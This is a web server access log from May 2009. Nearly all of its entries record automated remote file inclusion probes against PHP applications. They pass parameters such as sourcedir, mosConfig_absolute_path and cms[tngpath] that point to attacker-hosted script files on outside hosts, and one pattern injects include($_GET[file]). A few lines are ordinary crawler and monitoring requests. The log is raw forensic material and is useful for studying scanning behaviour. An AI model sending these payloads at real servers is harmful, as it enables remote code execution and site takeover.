91.121.210.42 - - [23/May/2009:03:33:41 -0400] "GET /logs/?sourcedir=http://billardshow.de/images/id.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
210.116.102.163 - - [23/May/2009:03:33:49 -0400] "GET /logs/access_log.Q108112300//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:03:33:49 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
210.116.102.163 - - [23/May/2009:03:33:50 -0400] "GET /logs//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
216.17.99.13 - - [23/May/2009:03:34:22 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
216.17.99.13 - - [23/May/2009:03:34:24 -0400] "GET /logs/access_log.Q109050700//components/com_simpleboard/image_upload.php?sbp=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:03:34:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B18215700E14D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [23/May/2009:03:34:36 -0400] "GET /?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:03:34:36 -0400] "GET /logs/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 200 2490 "-" "libwww-perl/5.805"
124.217.216.86 - - [23/May/2009:03:34:36 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
123.143.98.5 - - [23/May/2009:03:34:39 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
123.143.98.5 - - [23/May/2009:03:34:52 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
64.191.102.117 - - [23/May/2009:03:35:53 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [23/May/2009:03:35:53 -0400] "GET /logs/?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
64.191.102.117 - - [23/May/2009:03:35:53 -0400] "GET /?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:03:35:54 -0400] "GET /logs/access_log.Q109010700%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [23/May/2009:03:35:58 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.116.102.163 - - [23/May/2009:03:36:03 -0400] "GET /logs/error_log.Q108112300//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
64.191.102.117 - - [23/May/2009:03:36:49 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.191.102.117 - - [23/May/2009:03:36:49 -0400] "GET /logs/access_log.Q108091100%20%20/?sourcedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:37:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [23/May/2009:03:38:14 -0400] "GET /logs/access_log.Q108111500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:38:34 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.206.183.148 - - [23/May/2009:03:38:51 -0400] "GET /logs/access_log.Q109050900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.217.216.86 - - [23/May/2009:03:39:00 -0400] "GET /logs/error_log.Q108122200/include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
124.217.216.86 - - [23/May/2009:03:39:00 -0400] "GET /include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.826"
124.217.216.86 - - [23/May/2009:03:39:01 -0400] "GET /logs/include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.826"
218.246.20.221 - - [23/May/2009:03:39:59 -0400] "GET //com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://indoirc.go.ro/idB.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
213.189.224.21 - - [23/May/2009:03:40:05 -0400] "GET /logs/access_log.Q109020600//include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:03:40:05 -0400] "GET /logs//include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.811"
213.189.224.21 - - [23/May/2009:03:40:05 -0400] "GET //include/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.811"
218.52.34.165 - - [23/May/2009:03:40:45 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:03:40:45 -0400] "GET /logs/access_log.Q109020600//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:03:40:45 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:03:40:46 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:26 -0400] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:26 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:26 -0400] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:35 -0400] "GET /?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:35 -0400] "GET /logs/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:35 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:03:41:43 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:03:42:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.251.81.216 - - [23/May/2009:03:42:27 -0400] "GET /?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:27 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:27 -0400] "GET /logs/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:27 -0400] "GET /?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:30 -0400] "GET /logs/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:30 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:45 -0400] "GET //main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:45 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:45 -0400] "GET /logs//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:46 -0400] "GET /logs/access_log.Q109051200//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:50 -0400] "GET /logs//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:50 -0400] "GET //main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:50 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:42:51 -0400] "GET /logs/access_log.Q109051200//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:55 -0400] "GET /?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:59 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:42:59 -0400] "GET /logs/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
116.36.213.166 - - [23/May/2009:03:43:01 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
116.36.213.166 - - [23/May/2009:03:43:03 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
116.36.213.166 - - [23/May/2009:03:43:04 -0400] "GET /logs/access_log.Q109051100//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
116.36.213.166 - - [23/May/2009:03:43:29 -0400] "GET /logs/access_log.Q109020600//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:43:30 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:43:52 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:00 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.241.40.51 - - [23/May/2009:03:44:04 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:04 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:05 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:18 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:18 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:18 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:03:44:19 -0400] "GET /logs/error_log.Q108090500%20%20/?sourcedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:20 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:20 -0400] "GET /logs/access_log.Q108052200//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:20 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:23 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [23/May/2009:03:44:28 -0400] "GET /logs/access_log.Q108053100//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:44:32 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:44:32 -0400] "GET /logs/access_log.Q108121400%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:44:32 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:44:32 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:03:44:36 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:03:44:36 -0400] "GET /logs/access_log.Q108061500/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:03:44:36 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:37 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:37 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:37 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:41 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:41 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:44:41 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:44:49 -0400] "GET /logs/access_log.Q108060800%20%20//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:03:45:30 -0400] "GET /logs/access_log.Q108111500%20/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
218.52.34.165 - - [23/May/2009:03:45:39 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.143.98.5 - - [23/May/2009:03:45:41 -0400] "GET /logs/error_log.Q108090500%20/?sourcedir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.222.40.40 - - [23/May/2009:03:45:51 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.52.34.165 - - [23/May/2009:03:46:01 -0400] "GET /logs/access_log.Q108051700%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:06 -0400] "GET //?include_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.222.40.40 - - [23/May/2009:03:46:06 -0400] "GET /logs//?include_path=http://www.rabattguiden.se//templates/beez/css/test.txt?? HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
65.23.158.226 - - [23/May/2009:03:46:11 -0400] "GET /logs/error_log.Q108120400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:11 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:12 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:12 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:12 -0400] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:12 -0400] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:12 -0400] "GET /logs/access_log.Q108121400//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:46:14 -0400] "GET /logs/error_log.Q108120400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:23 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:03:46:25 -0400] "GET /logs/access_log.Q109050700%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.222.40.40 - - [23/May/2009:03:46:27 -0400] "GET /logs/access_log.Q108060800//historytemplate.php?cms[support]=1&cms[tngpath]=http://vash-ru.net/vipzona/tmp/mawar.txt??????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:03:46:41 -0400] "GET /logs/access_log.Q108111500//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
